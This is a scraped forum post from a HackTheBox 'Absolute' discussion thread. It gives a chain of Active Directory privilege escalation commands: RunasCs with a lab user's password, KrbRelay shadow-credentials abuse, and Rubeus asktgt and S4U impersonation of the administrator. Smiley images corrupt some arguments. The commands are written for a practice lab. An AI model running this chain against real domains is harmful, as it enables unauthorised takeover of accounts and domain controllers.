<div class="post_head">
<div class="float_right" style="vertical-align: top">
<!--<strong><a href="Thread-RaidForums-Official-Telegram?pid=556306#pid556306" title="RaidForums Official Telegram">#1</a></strong>-->
<div class="float_right" style="vertical-align: top">
<strong><a href="Thread-Absolute-HTB-Discussion?pid=556306#pid556306" title="RE: Absolute - HTB [Discussion]">#132</a></strong>
</div>
</div>
<span class="post_date"><span title="September 29, 2022, 05:57 PM">5 hours ago</span> <span class="post_edit" id="edited_by_556306"></span></span>
</div>
<div class="post_body scaleimages" id="pid_556306">
					Rubeus worked here trying  follow  <a class="mycode_url" href="https://icyguider.github.io/2022/05/19/NoFix-LPE-Using-KrbRelay-With-Shadow-Credentials.html" rel="noopener" target="_blank">https://icyguider.github.io/2022/05/19/N...tials.html</a><br>
<br>
but i fail to convert kirb to ccache using  <a class="mycode_url" href="https://github.com/SolomonSklash/RubeusToCcache" rel="noopener" target="_blank">https://github.com/SolomonSklash/RubeusToCcache</a><br>
<br/>
./runascs.exe m.lovegod 'AbsoluteLDAP2022!' -d absolute.htb -l 9 "C:\users\winrm_user\KrbRelay.exe -spn ldap/dc.absolute.htb -clsid {752073A1-23F2-4396-85F0-8FDB879ED0ED} -shadowcred"<br/>
<br/>
<br/>
.\Rubeus.exe asktgt /user<img alt="Big Grin" class="smilie smilie_4" src="https://breached.to/images/smilies/biggrin.png" title="Big Grin">C$ /certificate:certificate /password:"password" /getcredentials /show<br/>
<br/>
<br/>
<br/>
<br/>
.\Rubeus.exe asktgt /user<img alt="Big Grin" class="smilie smilie_4" src="https://breached.to/images/smilies/biggrin.png" title="Big Grin"/>C$ /certificate:certificate /password:"password" /enctype:AES256 /nowrap<br/>
<br/>
<br/>
.\Rubeus.exe s4u /self /user<img alt="Big Grin" class="smilie smilie_4" src="https://breached.to/images/smilies/biggrin.png" title="Big Grin"/>C$ /impersonateuser:administrator /altservice:host/DC /ptt /ticket:ticket
				</img></br></br></br></div>
<div class="post_meta" id="post_meta_556306">
<div class="float_right">
</div>
</div>